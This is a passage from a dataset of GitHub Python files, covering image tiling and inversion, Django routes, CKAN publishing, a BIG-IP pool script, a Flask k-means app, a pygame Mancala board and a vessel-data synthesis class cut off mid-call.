size of the image\n width, height = img.size\n\n # the outer for loop will iterate over the height.\n for i in range(0,number_of_tiles_tuple[1]):\n 
# the inner for loop will iterate over width.\n for j in range(0,number_of_tiles_tuple[0]):\n points=(j*input_image_size[0],i*input_image_size[1],(j+1)*input_image_size[0],(i+1)*input_image_size[1])\n frame = img.crop(points)\n frame.save(directory+\"/crop_\"+str(i)+\"_\"+str(j)+\"_\"+\".jpg\")\n\n\nif __name__ == \"__main__\":\n # test if the function works.\n make_Tiles('../Preprocess_data/dhiki.jpg',(5,2),\"../image_tiles\")\n\n\n\n\n","repo_name":"rashid0531/predictive_contador_de_flores","sub_path":"Preprocess_data/another_slicer.py","file_name":"another_slicer.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71491644094","text":"import cv2\nimport os\n\n\ndef file_name(file_dir):\n # print file_dir\n L = []\n for root, dirs, files in os.walk(file_dir):\n # print(root)\n # print(dirs)\n #print file_dir\n for file in files:\n if os.path.splitext(file)[1] == '.jpg':\n L.append(os.path.join(file))\n return L\nfile_dir='/root/darknet/scripts/VOCdevkit/VOCaccuracy/wat1212/'\ngoal_dir='/root/darknet/scripts/VOCdevkit/VOCaccuracy/wat1212black/'\nfor name in file_name(file_dir):\n img = cv2.imread(file_dir+name);\n dot = name.find('.')\n # namenum=int(name[:dot])\n rows, cols, channels = img.shape\n for i in range(rows):\n for j in range(cols):\n for c in range(3):\n \timg[i,j][c]=255-img[i,j][c]\n \n cv2.imwrite(goal_dir+name, img)","repo_name":"yenanfei/Pascal-VOC-standardizing","sub_path":"changewhite.py","file_name":"changewhite.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36708153731","text":"from django.urls import path\nfrom django.contrib.auth.views import login\nfrom . 
import views\n\napp_name = 'featureselection'\nurlpatterns = [\n path('', views.index, name='index'),\n path('add_task/', views.add_task, name='add_task'),\n path('task_result/', views.task_result, name='task_result'),\n path('show_result/', views.show_result, name='show_result'),\n path('show_user_result/', views.show_user_result, name='show_user_result'),\n path('show_best_result/', views.show_best_result, name='show_best_result'),\n path('export_result///', views.export_result, name='export_result'),\n path('analyze_user_choice/', views.analyze_user_choice, name='analyze_user_choice'),\n path('delete_own_result/', views.delete_own_result, name='delete_own_result'),\n path('show_history/', views.show_history, name='show_history'),\n path('delete_task//', views.delete_task, name='delete_task'),\n path('download///', views.download, name='download'),\n path('download_bestsubset/', views.download_bestsubset, name='download_bestsubset'),\n path('choose_result///', views.choose_result, name='choose_result'),\n]","repo_name":"rishabhgoel04/fsSelectionProject","sub_path":"featureselection/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3602832046","text":"\"\"\"\nPublish HSCIC Indicators to CKAN !\n\"\"\"\nimport logging\nimport sys\nimport ffs\nimport dc\n\n\nlogging.basicConfig(filename='publish.log',\n format='%(asctime)s %(levelname)s: %(message)s',\n level=logging.DEBUG)\n\n\nDATA_DIR = ffs.Path.here()/'../data'\n\n\ndef publish_indicators(start_from=0):\n indicatorfile = DATA_DIR/'indicators.json'\n logging.info('Loading {}'.format(indicatorfile))\n indicators = indicatorfile.json_load()\n amount = len(indicators)\n logging.info('Processing {} indicators'.format(amount))\n logging.info('Starting from record {}'.format(start_from))\n for indicator in indicators[start_from:10]:\n logging.info('{} of {}'.format(start_from, amount))\n start_from += 1\n try:\n logging.info('Processing {}'.format(indicator['title']))\n logging.info('ID: {}'.format(indicator['unique identifier'].lower()))\n resources = [\n dict(\n description=s['description'],\n name=s['url'].split('/')[-1],\n format=s['filetype'],\n upload=dc.fh_for_url(s['url'])\n )\n for s in indicator['sources']\n ]\n name = 'hscic_indicator_{}'.format(indicator['unique identifier'].lower())\n # Metadata specified by NHSEngland identified in comments...\n dc.Dataset.create_or_update(\n name=name, # Unique ID\n title=indicator['title'], #title\n notes=indicator['definition'], # description\n tags=dc.tags(*indicator['keyword(s)']), # tags\n extras=[\n {'key': 'Public Access Level',\n 'value': 'Public',},\n {'key': 'Data Quality Assurance',\n 'value': 'False'},\n {'key': 'Release Date',\n 'value': indicator['current version uploaded'],},\n {'key': 'Status',\n 'value': 'Live',},\n ],\n state='active',\n licence_id='ogl',\n url='https://indicators.ic.nhs.uk/webview/',\n resources=resources,\n groups=[\n {'name': 'indicators'},\n ],\n owner_org='hscic' # publisher\n )\n except Exception as ex:\n logging.error(ex)\n return\n\ndef publish_datasets(start_from=0):\n datasetfile = DATA_DIR/'datasets.json'\n logging.info('Loading {}'.format(datasetfile))\n datasets = datasetfile.json_load()\n amount = len(datasets)\n logging.info('Processing {} datasets'.format(amount))\n logging.info('Starting from record {}'.format(start_from))\n for dataset in datasets[start_from:10]:\n try:\n logging.info('{} of 
{}'.format(start_from, amount))\n start_from += 1\n logging.info('Processing {}'.format(dataset['title']))\n logging.info('ID: {}'.format(dataset['id']))\n resources = [\n dict(\n description=s['description'],\n name=s['url'].split('/')[-1],\n format=s['filetype'],\n upload=dc.fh_for_url(s['url'])\n )\n for s in dataset['sources']\n ]\n notes = dataset['summary']\n if 'key_facts' in dataset:\n notes += '\\n\\nKEY FACTS:\\n==========\\n\\n' + dataset['key_facts']\n extras = [\n {'key': 'Public Access Level',\n 'value': 'Public',},\n {'key': 'Data Quality Assurance',\n 'value': 'False'},\n {'key': 'Status',\n 'value': 'Live',},\n ]\n if 'date_range' in dataset:\n extras.append({\n 'key': 'Time period',\n 'value': dataset['date_range'],\n })\n if 'publication_date' in dataset:\n extras.append({\n 'key': 'Release date',\n 'value': dataset['publication_date'],\n })\n if 'geographical_coverage' in dataset:\n extras.append({\n 'key': 'Geographical coverage',\n 'value': ', '.join(dataset['geographical_coverage'])\n })\n # groups\n groups = []\n for item in dataset['topics']:\n groups.append(item)\n for item in dataset['information_types']:\n groups.append(item)\n group_faff = []\n for g in groups:\n group_name = dc.ensure_group(g, 'HSCIC')\n group_faff.append({\n 'name': group_name,\n })\n name = 'hscic_dataset_{}'.format(dataset['id'])\n # NHSEngland metadata as comments...\n dc.Dataset.create_or_update(\n name=name, # Unique ID\n title=dataset['title'], # title\n notes=notes, # description\n tags=dc.tags(*dataset['keywords']), # tags\n extras=extras,\n state='active',\n licence_id='ogl',\n url=dataset['source'],\n resources=resources,\n groups=group_faff,\n owner_org='hscic' # publisher\n )\n except Exception as ex:\n logging.error(ex)\n return\n\ndef main():\n dc.ensure_publisher('hscic')\n dc.ensure_group('indicators', 'hscic')\n publish_indicators()\n publish_datasets()\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"davidmiller/hscic","sub_path":"publish/hscic_indicators_to_ckan.py","file_name":"hscic_indicators_to_ckan.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16392566171","text":"'prepare a training file from train.csv and train_answers.csv'\n\nimport sys, csv\n\noutput_file = sys.argv[1]\n\ninput_file = 'data/orig/train.csv'\nanswers_file = 'data/orig/train_answers.csv'\n\n# mapping author -> gender\n\nwriters = {}\nreader = csv.reader( open( answers_file ))\nheaders = reader.next()\n\nfor line in reader:\n\twriter_id, gender = line\n\twriters[writer_id] = gender\n\t\n###\n\nreader = csv.reader( open( input_file ))\nwriter = csv.writer( open( output_file, 'wb' ))\n\n# prep headers\nheaders = reader.next()\nheaders = headers[2:]\nheaders.insert( 0, 'gender' )\nwriter.writerow( headers )\n\nfor line in reader:\n\t\n\tif line[2] == 'Arabic':\n\t\tline[2] = 0\n\telse:\n\t\tline[2] = 1\n\t\t\n\twriter_id = line[0]\n\tgender = writers[writer_id]\n\n\tline = line[2:]\n\tline.insert( 0, gender )\n\t\n\twriter.writerow( line )\n\t\n\t","repo_name":"zygmuntz/kaggle-gender","sub_path":"prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"7399083880","text":"from f5.bigip import ManagementRoot\n\n# Connect to the BigIP\nmgmt = ManagementRoot(\"10.100.116.200\", \"admin\", \"eve\")\n\n\n#Delete a pool if it exists\nif 
mgmt.tm.ltm.pools.pool.exists(name='mypool', partition='Common'):\n pool_b = mgmt.tm.ltm.pools.pool.load(name='mypool', partition='Common')\n pool_b.delete()\n\n\nprint(\"============= Version ============\" + '\\n' + \n mgmt.tmos_version+ '\\n' + \n \"==================================\" )\n\n\n# Create a new pool on the BIG-IP\nmgmt.tm.ltm.pools.pool.create(name='mypool', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool2', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool3', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool4', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool5', partition='Common')\n\n# Load an existing pool and update its description\npool_a = mgmt.tm.ltm.pools.pool.load(name='mypool', partition='Common')\npool_a.description = \"New description\"\npool_a.update()\n\n\n# Get a list of all pools on the BigIP and print their names and their\n# members' names\npools = mgmt.tm.ltm.pools.get_collection()\nfor pool in pools:\n print(pool.name)\n for member in pool.members_s.get_collection():\n print(member.name)\n","repo_name":"socio-nine/Network-Automation-Python","sub_path":"F5/f5_api_1.py","file_name":"f5_api_1.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43660031015","text":"def test_form_view(request):\n if request.method == \"POST\":\n form = TestForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('save ho gya bhai!')\n else:\n return HttpResponse('noooo its invalid')\n\n return render(request, 'test.html', {\n 'objects': TestModel.objects.all()\n })","repo_name":"Ammadkhalid/django-mvv-for-ahmad","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38727483000","text":"import json\n\nfrom starlette.responses import PlainTextResponse\nfrom starlette.status import (\n HTTP_404_NOT_FOUND,\n HTTP_406_NOT_ACCEPTABLE,\n HTTP_400_BAD_REQUEST,\n HTTP_501_NOT_IMPLEMENTED,\n HTTP_500_INTERNAL_SERVER_ERROR,\n)\n\n\ndef response_error_handler(result):\n if result[\"status\"] == 501:\n return http_501_not_implemented()\n if result[\"status\"] == 500:\n return http_500_internal_server_error()\n if result[\"status\"] == 406:\n return http_406_not_acceptable()\n if result[\"status\"] == 400:\n return http_400_bad_request()\n if result[\"status\"] == 501:\n return http_501_not_implemented()\n if result[\"status\"] == 404:\n return http_404_not_found()\n else:\n return http_unknown_error(result)\n\n\ndef http_unknown_error(result):\n response_msg = json.dumps({\"status_code\": result[\"status\"], \"details\": \"Unknown\"})\n return PlainTextResponse(response_msg, status_code=result[\"status\"])\n\n\ndef http_400_bad_request():\n response_msg = json.dumps(\n {\"status_code\": HTTP_400_BAD_REQUEST, \"details\": \"Bad Request\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_400_BAD_REQUEST)\n\n\ndef http_404_not_found():\n response_msg = json.dumps(\n {\"status_code\": HTTP_404_NOT_FOUND, \"details\": \"Not Found\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_404_NOT_FOUND)\n\n\ndef http_406_not_acceptable():\n response_msg = json.dumps(\n {\"status_code\": HTTP_406_NOT_ACCEPTABLE, \"details\": \"Not Acceptable\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_406_NOT_ACCEPTABLE)\n\n\ndef 
http_501_not_implemented():\n response_msg = json.dumps(\n {\n \"status_code\": HTTP_501_NOT_IMPLEMENTED,\n \"details\": \"Not Implemented\",\n }\n )\n return PlainTextResponse(response_msg, status_code=HTTP_501_NOT_IMPLEMENTED)\n\n\ndef http_500_internal_server_error():\n response_msg = json.dumps(\n {\n \"status_code\": HTTP_500_INTERNAL_SERVER_ERROR,\n \"details\": \"Internal Server Error\",\n }\n )\n return PlainTextResponse(response_msg, status_code=HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"Ensembl/ensembl-web-metadata-api","sub_path":"app/api/error_response.py","file_name":"error_response.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70967470656","text":"from flask import *\nfrom kmeans import k_cluster\nfrom utils import flatten_input, unflatten_input, image_to_mat\nfrom PIL import Image as im\nimport numpy as np\nfrom keras.preprocessing.image import save_img\nimport gunicorn\nimport os, re, os.path\nimport gc\n\ndef get_size(fobj):\n\n if fobj.content_length:\n return fobj.content_length\n\n try:\n pos = fobj.tell()\n fobj.seek(0, 2) #seek to end\n size = fobj.tell()\n fobj.seek(pos) # back to original position\n return size\n except (AttributeError, IOError):\n pass\n\n # in-memory file object that doesn't support seeking or tell\n return 0 #assume small enough\n\n\n\napp = Flask(__name__)\n@app.route('/')\ndef upload():\n return render_template(\"file_upload_form.html\")\n\n@app.route('/success', methods = ['POST'])\ndef success():\n folder = \"static/\"\n\n if request.method == \"POST\":\n gc.collect()\n for root, dirs, all_files in os.walk(folder):\n for item in all_files:\n if item!= \"sample.png\":\n os.remove(os.path.join(root, item))\n f = request.files[\"file\"]\n obj_size = get_size(f) \n\n if obj_size > 200*1024:\n abort(413)\n\n\n if obj_size == 0:\n abort(400, \"please upload a picture before submission\")\n\n if len(request.form.get(\"num_clusters\"))!=0:\n num_clus = int(request.form.get(\"num_clusters\"))\n else:\n abort(400, \"please set the number of clusters before submission\")\n out = folder+f.filename\n f.save(out)\n image_mat = image_to_mat(out)\n new_image = k_cluster(image_mat, k=num_clus)\n del image_mat\n raw_name = f.filename.split(\".\")[0] + \"_cluster\"+ str(num_clus) \\\n + \".png\" \n path_out = folder + raw_name \n save_img(path_out, new_image)\n del new_image\n gc.collect()\n return render_template(\"success.html\", name = out, num_clusters = num_clus, processed_img = path_out )\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"Arjunvankani/Segmenatation-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42612235738","text":"\"\"\"\nParametric Mesh Creation for Scene Setup\n\"\"\"\nfrom gt.utils.data.py_meshes.mesh_data import MeshData\nimport maya.cmds as cmds\nimport logging\n\n# Logging Setup\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_studio_background(name=\"studio_background\", initial_scale=1):\n \"\"\"\n Creates a studio background mesh\n Args:\n name (str, optional): The name for the created mesh.\n initial_scale (int, float, optional): Sets the initial scale of the mesh object\n \"\"\"\n selection = cmds.ls(selection=True)\n plane_transform, poly_plane_node = cmds.polyPlane(name=name, w=1, 
h=1, sx=10, sy=10, ax=(0, 1, 0), cuv=2, ch=1)\n\n # Set attributes for the poly plane\n cmds.setAttr(f\"{poly_plane_node}.height\", 40)\n cmds.setAttr(f\"{poly_plane_node}.width\", 40)\n cmds.setAttr(f\"{poly_plane_node}.subdivisionsHeight\", 50)\n cmds.setAttr(f\"{poly_plane_node}.subdivisionsWidth\", 50)\n\n cmds.rename(poly_plane_node, f'{name}_polyPlane')\n\n # Create a bend deformer and set its attributes\n bend_node_one, bend_handle_one = cmds.nonLinear(plane_transform, name=f'{name}_bendY', typ=\"bend\",\n lowBound=0, highBound=1, curvature=90)\n\n cmds.rotate(0, -90, 0, bend_handle_one, r=True, os=True, fo=True)\n cmds.rotate(0, 0, 90, bend_handle_one, r=True, os=True, fo=True)\n\n bend_node_two, bend_handle_two = cmds.nonLinear(plane_transform, name=f'{name}_bendZ', typ=\"bend\",\n lowBound=-1, highBound=1, curvature=110)\n\n bend_handles = [bend_handle_one, bend_handle_two]\n\n cmds.rotate(0, -90, 0, bend_handle_two, r=True, os=True, fo=True)\n cmds.rotate(-90, 0, 0, bend_handle_two, r=True, os=True, fo=True)\n cmds.move(0, 0, 7, bend_handle_two, r=True)\n\n cmds.parent([bend_handle_one, bend_handle_two], plane_transform)\n\n cmds.move(0, 0, -10, plane_transform, r=True)\n cmds.xform(plane_transform, piv=(0, 0, 11), ws=True)\n cmds.move(0, 0, 0, plane_transform, a=True, rpr=True) # rpr flag moves it according to the pivot\n\n for handle in bend_handles:\n cmds.setAttr(f'{handle}.v', 0)\n\n cmds.setAttr(f'{plane_transform}.sx', initial_scale)\n cmds.setAttr(f'{plane_transform}.sy', initial_scale)\n cmds.setAttr(f'{plane_transform}.sz', initial_scale)\n\n cmds.select(clear=True)\n if selection:\n try:\n cmds.select(selection)\n except Exception as e:\n logger.debug(f'Unable to recover selection. Issue: {str(e)}')\n\n return MeshData(name=plane_transform, setup=bend_handles)\n\n\nif __name__ == \"__main__\":\n logger.setLevel(logging.DEBUG)\n cmds.file(new=True, force=True)\n create_studio_background()\n","repo_name":"ChunMinStudio/gt-tools","sub_path":"gt/utils/data/py_meshes/scene_setup.py","file_name":"scene_setup.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"13711599284","text":"import random\r\n\r\nfrom art import logo \r\n# deal_card() function that uses the list to return a random card.\r\ndef deal_cards():\r\n \"\"\"This function draws one card from the deck of cards. Here 11 is ace.\"\"\"\r\n cards = [2,3,4,5,6,7,8,9,10,10,10,10,11]\r\n card = random.choice(cards)\r\n return card\r\n\r\n# calculate_score() that takes a list of cards as input and return score\r\n# Look up the sum() function\r\ndef calculate_scores(cards):\r\n# check for a blackjack (a hand with only 2 cards: ace + 10) and return 0 instead of the actual score.\r\n# 0 will represent a blackjack in our game.\r\n if sum(cards)==21 and len(cards)==2:\r\n return 0\r\n # check for an 11 (ace). If the score is already over 21, \r\n # remove the 11 and replace it with a 1. 
\r\n # You might need to look up append() and remove().\r\n if 11 in cards and sum(cards)>21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\n# compare function\r\ndef compare(user_score,dealer_score):\r\n if user_score == dealer_score:\r\n return \"It's a Draw.\"\r\n elif dealer_score == 0:\r\n return \"You lose, Opponent has a BlackJack\"\r\n elif user_score == 0:\r\n return \"You Win.\"\r\n elif user_score > 21:\r\n return \"You lose you went over 21.\"\r\n elif dealer_score > 21:\r\n return \"You Win, Opponent went over.\"\r\n elif user_score>dealer_score:\r\n return \"You Win\"\r\n else:\r\n return \"You Lose.\"\r\n\r\ndef play_game():\r\n print(logo)\r\n user_cards = []\r\n dealer_cards = []\r\n is_gameover = False\r\n\r\n for _ in range(2):\r\n user_cards.append(deal_cards())\r\n dealer_cards.append(deal_cards())\r\n\r\n while not is_gameover:\r\n user_score = calculate_scores(user_cards)\r\n dealer_score = calculate_scores(dealer_cards)\r\n print(f\"Your Cards: {user_cards}, Your Current Score is: {user_score}\")\r\n print(f\"Dealers Cards: {dealer_cards[0]}\")\r\n\r\n if user_score == 0 or dealer_score == 0 or user_score > 21:\r\n is_gameover = True\r\n else:\r\n deal = input(\"Type 'y' to get another card, type 'n' to pass: \\n\")\r\n if deal == 'y':\r\n user_cards.append(deal_cards())\r\n else:\r\n is_gameover= True\r\n\r\n while dealer_score != 0 and dealer_score < 17:\r\n dealer_cards.append(deal_cards())\r\n dealer_score = calculate_scores(dealer_cards)\r\n\r\n print(f\"You Final hand is {user_cards}, Final Score: {user_score}\")\r\n print(f\"Dealer's hand is {dealer_cards}, Final Score: {dealer_score}\")\r\n print(compare(user_score, dealer_score))\r\n\r\nwhile input(\"Do you want to play a game of 21? Type 'y' or 'n': \")==\"y\":\r\n \r\n play_game()\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"wiznikvibe/BLACKJACK","sub_path":"capstone_blackjack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13462325045","text":"import pygame\nfrom stone import Stone\nimport numpy as np\nfrom const import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n BOARD_COLOR,\n BOWL_COLOR\n)\n\n\nclass Board():\n currently_animating = False\n state = {\n 'bowl': {\n 'p1': [[]]*6,\n 'p2': [[]]*6\n },\n 'goal': {\n 'p1': [],\n 'p2': []\n },\n 'moving': []\n }\n turn = 'p1'\n\n center = (SCREEN_WIDTH/2, SCREEN_HEIGHT/2)\n goal_width = 75\n hor_offset = 20\n board_shape = (700, 200)\n bowl_diameter = (board_shape[0] - (2*goal_width) - (9*hor_offset))/6\n ver_offset = (board_shape[1]-2*bowl_diameter)/3 \n p1_bowl_pos = []\n p2_bowl_pos = []\n p1_goal_pos = None\n p2_goal_pos = None\n\n def init_stones_on_bowl(self, bowl_center, bowl_index, player):\n pos = (bowl_center[0],bowl_center[1] + self.bowl_diameter/4)\n stone_1 = Stone(pos)\n pos = (bowl_center[0] + self.bowl_diameter/4,bowl_center[1])\n stone_2 = Stone(pos)\n pos = (bowl_center[0],bowl_center[1] - self.bowl_diameter/4)\n stone_3 = Stone(pos)\n pos = (bowl_center[0] - self.bowl_diameter/4,bowl_center[1])\n stone_4 = Stone(pos)\n self.state['bowl'][player][bowl_index] = [stone_1, stone_2, stone_3, stone_4]\n \n\n def init_stones(self):\n # initialize stones on the board\n for i in range(6):\n self.init_stones_on_bowl(self.p1_bowl_pos[i], i, 'p1')\n self.init_stones_on_bowl(self.p2_bowl_pos[i], i, 'p2')\n\n\n def __init__(self):\n self.surf = pygame.Surface(self.board_shape)\n 
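# paint the background colour onto the newly created board surface\n 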
self.surf.fill(BOARD_COLOR)\n self.pos = (self.center[0]-(self.surf.get_width()/2), self.center[1]-(self.surf.get_height()/2))\n\n # initialize bowl positions\n for i in range(6):\n x_pos = self.center[0] - self.surf.get_width()/2 + self.hor_offset*2 + self.goal_width + self.bowl_diameter/2 + (self.bowl_diameter+self.hor_offset)*i\n y_pos = self.center[1] - self.ver_offset/2 - self.bowl_diameter/2\n self.p2_bowl_pos.append(np.array([x_pos,y_pos]))\n y_pos += self.ver_offset + self.bowl_diameter\n self.p1_bowl_pos.append(np.array([x_pos,y_pos]))\n\n # initialize stones\n self.init_stones() \n\n # def update(self):\n # for bowl in self.state['bowl']['p1']:\n # for stone in bowl:\n # stone.update()\n # for bowl in self.state['bowl']['p2']:\n # for stone in bowl:\n # stone.update()\n\n\n def draw(self, screen):\n # draw board background\n screen.blit(self.surf, self.pos)\n\n # draw left goal\n left = self.center[0]-(self.surf.get_width()/2) + self.hor_offset\n top = self.center[1]-(self.surf.get_height()/2) + self.ver_offset\n self.p2_goal_pos = (self.center[0]-(self.surf.get_width()/2) + self.hor_offset + self.goal_width/2, self.center[1])\n bound = pygame.Rect(left, top, self.goal_width, self.board_shape[1]-2*self.ver_offset)\n pygame.draw.ellipse(screen, BOWL_COLOR, bound)\n\n # draw right goal\n left = self.center[0]+(self.surf.get_width()/2) - self.hor_offset - self.goal_width\n self.p1_goal_pos = (self.center[0]+(self.surf.get_width()/2) - self.hor_offset - self.goal_width/2, self.center[1])\n bound = pygame.Rect(left, top, self.goal_width, self.board_shape[1]-2*self.ver_offset)\n pygame.draw.ellipse(screen, BOWL_COLOR, bound)\n\n # draw bowls\n for i in range(6): \n pygame.draw.circle(screen, BOWL_COLOR, self.p1_bowl_pos[i], self.bowl_diameter/2)\n pygame.draw.circle(screen, BOWL_COLOR, self.p2_bowl_pos[i], self.bowl_diameter/2)\n\n # draw stones\n for bowl in self.state['bowl']['p1']:\n for stone in bowl:\n stone.draw(screen)\n for bowl in self.state['bowl']['p2']:\n for stone in bowl:\n stone.draw(screen)\n for stone in self.state['goal']['p1']:\n stone.draw(screen)\n for stone in self.state['goal']['p2']:\n stone.draw(screen)\n for stone in self.state['moving']:\n stone.draw(screen)","repo_name":"Annacaro22/4701Mancala","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5737411770","text":"import numpy as np\nimport os\nimport SimpleITK as sitk\nimport random\nimport json\nimport argparse\nimport sys\n\n\nclass DataSyn:\n def __init__(\n self,\n source_dir,\n target_dir,\n ):\n \"\"\"\n source_dir: The directory of the raw data.\n target_dir: The directory of the data to be synthesized.\n\n Input: source_dir/\n - pulse_xxxxx_volume.nii.gz % original volume\n - pulse_xxxxx_graph.json % graph with edge information\n ...\n\n Output: target_dir/\n - pulse_xxxxx_idx_volume.nii.gz % synthesized volume with single disconnection\n - pulse_xxxxx_idx_kp1_part.nii.gz % kp1 part of the synthesized volume\n - pulse_xxxxx_idx_kp2_part.nii.gz % kp2 part of the synthesized volume\n - pulse_xxxxx_idx_data.npz % meta data of the synthesized volume\n ...\n\n Note: centerline infomation will not be used in this process.\n \"\"\"\n self.source_dir = source_dir\n self.target_dir = target_dir\n self.pulse_ids = [i[:11] for i in os.listdir(source_dir) if '.json' in i]\n\n def data_process(self, pulse_id, volume, edge, idx):\n point_coord = 
np.array(edge['point_coord'])\n point_number = edge['point_number']\n tolerance = 0\n flag = 0\n while True:\n # choose the location of KP1 and KP2\n kp1_range = [0.05, 0.4]\n kp2_range = [0.6, 0.95]\n kp1_location = np.random.random() * (kp1_range[1] - kp1_range[0]) + kp1_range[0]\n kp2_location = np.random.random() * (kp2_range[1] - kp2_range[0]) + kp2_range[0]\n kp1 = point_coord[round(kp1_location * point_number)]\n kp2 = point_coord[round(kp2_location * point_number)]\n kp_mid = point_coord[round(0.5 * point_number)]\n coords = np.argwhere(volume != 0)\n\n edge_points_dif = point_coord[1:] - point_coord[:-1] # point_x - point_(x+1)\n edge_points_dis = np.sqrt(np.sum(edge_points_dif ** 2, axis=1))\n edge_points_toend_dis = []\n for i in range(point_number):\n if i == 0:\n edge_points_toend_dis.append(0.0)\n elif i == point_number - 1:\n edge_points_toend_dis.append(0.0)\n else:\n edge_points_toend_dis.append(min(np.sum(edge_points_dis[:i]), np.sum(edge_points_dis[i:])))\n edge_points_toend_dis = np.array(edge_points_toend_dis)\n\n vector_1 = kp_mid - kp1\n vector_2 = kp_mid - kp2\n radius_cutoff = np.random.random() * (2 - 1.3) + 1.3\n noise_level = np.random.random() * (4 - 1) + 1\n\n for p in coords:\n if (p - kp1).dot(vector_1) > 0 and (p - kp2).dot(vector_2) > 0:\n distance = np.sum((p - point_coord) ** 2, axis=1)\n closest_index = np.argmin(distance)\n\n if distance[closest_index] < (edge['radius_max'] * radius_cutoff) ** 2:\n volume[p[0], p[1], p[2]] = 0\n ratio = 1 - (edge_points_toend_dis[closest_index] / np.max(edge_points_toend_dis))\n\n if random.random() < ratio ** noise_level * 0.5:\n volume[p[0], p[1], p[2]] = 1\n\n volume_img = sitk.GetImageFromArray(volume)\n component_image = sitk.ConnectedComponent(volume_img)\n sorted_component_image = sitk.RelabelComponent(component_image, minimumObjectSize=15, sortByObjectSize=True)\n sorted_component = sitk.GetArrayFromImage(sorted_component_image)\n\n # label_0: the label of the kp1 component; label_1: the label of the kp2 component\n label_0 = sorted_component[kp1[0], kp1[1], kp1[2]]\n label_1 = sorted_component[kp2[0], kp2[1], kp2[2]]\n\n # label=0: background\n if label_0 * label_1 > 0 and label_0 != label_1:\n seg_0 = sorted_component == label_0\n seg_1 = sorted_component == label_1\n disconnected_volume = np.logical_or(seg_0, seg_1) + 0\n seg_0_size = np.sum(seg_0)\n seg_1_size = np.sum(seg_1)\n\n # make sure kp1 locate at the main part of the pulmonary tree\n if seg_0_size > seg_1_size:\n kp1_seg = seg_0 + 0\n kp2_seg = seg_1 + 0\n kp1_coord = kp1\n kp2_coord = kp2\n else:\n kp1_seg = seg_1 + 0\n kp2_seg = seg_0 + 0\n kp1_coord = kp2\n kp2_coord = kp1\n\n disconnected_volume_nii = sitk.GetImageFromArray(np.uint8(disconnected_volume))\n sitk.WriteImage(disconnected_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_'+str(idx)+'_volume.nii.gz')\n\n kp1_volume_nii = sitk.GetImageFromArray(np.uint8(kp1_seg))\n sitk.WriteImage(kp1_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_' + str(idx) + '_kp1_part.nii.gz')\n\n kp2_volume_nii = sitk.GetImageFromArray(np.uint8(kp2_seg))\n sitk.WriteImage(kp2_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_' + str(idx) + '_kp2_part.nii.gz')\n\n npz_name = os.path.join(self.target_dir, pulse_id + '_' + str(idx) + '_data.npz')\n if not os.path.exists(npz_name):\n np.savez_compressed(npz_name,\n volume=disconnected_volume,\n kp1_part=kp1_seg,\n kp2_part=kp2_seg,\n kp1_coord=kp1_coord,\n kp2_coord=kp2_coord,\n edge_points=point_coord, # (n,3)\n 
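# the scalar edge attributes below are copied straight from the graph json\n 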
